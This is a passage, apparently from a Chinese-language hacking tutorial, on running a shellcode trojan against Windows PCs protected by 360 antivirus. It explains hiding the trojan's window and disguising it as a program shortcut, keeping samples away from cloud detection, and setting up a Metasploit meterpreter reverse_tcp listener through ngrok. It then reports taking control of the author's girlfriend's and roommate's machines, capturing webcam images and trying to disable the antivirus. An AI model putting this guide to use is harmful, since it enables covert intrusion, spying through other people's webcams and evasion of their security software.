只要在不影响shellcode的情况下,你可以对这个程序再增加扩展(就看你的c语言功底了),比如这里使用#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\”")隐藏程序窗口,并用这个程序取代快捷方式,再通过这个程序调用原来真正的程序基本就神不知鬼不觉了。
其次就是建议各位在测试自己的木马时一定要关闭云端上传功能,360会收集可以软件,上传云端检测,然后备份通杀,所以你的木马没准今天还可以免杀,明天就全国联保了。心疼被吃的一个马。
先配置好监听端
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit
注意LHOST和LPORT配置为之前和ngrok绑定的本地的端口!!
然后等待别人运行我们的木马。如下就是成功了。
然后我让远在异地的女友和我的室友帮我测试了一下,结果也是成功的,具体你们也可以试试。这个时候你基本可以操控很多功能了。
但是我又发现360的行为检测会阻止meterpreter许多功能,简单的getsystem提权绝对失败,通过哈希传递和假冒令牌的方式提权,都会被报可疑程序在调用驱动,甚至拍照都会报可以程序在调用摄像头(部分电脑不会报)
然后msf会收到一张360的调戏图:
但是你接着第二次使用:
Webcam_snap 1又不会报并且拍照成功(很奇怪)
再至于常规的持久化控制命令不是失败就是会被360查杀
并将我们的木马曝光(十分危险),而如果尝试关闭360的进程则其核心进程又无法关闭,又尝试运行360的卸载程序,结果又报可以程序在调用360部分文件,非常恼火。
据说通过删除系统文件夹就可以卸载360了,不过不建议,因为那等于暴露了。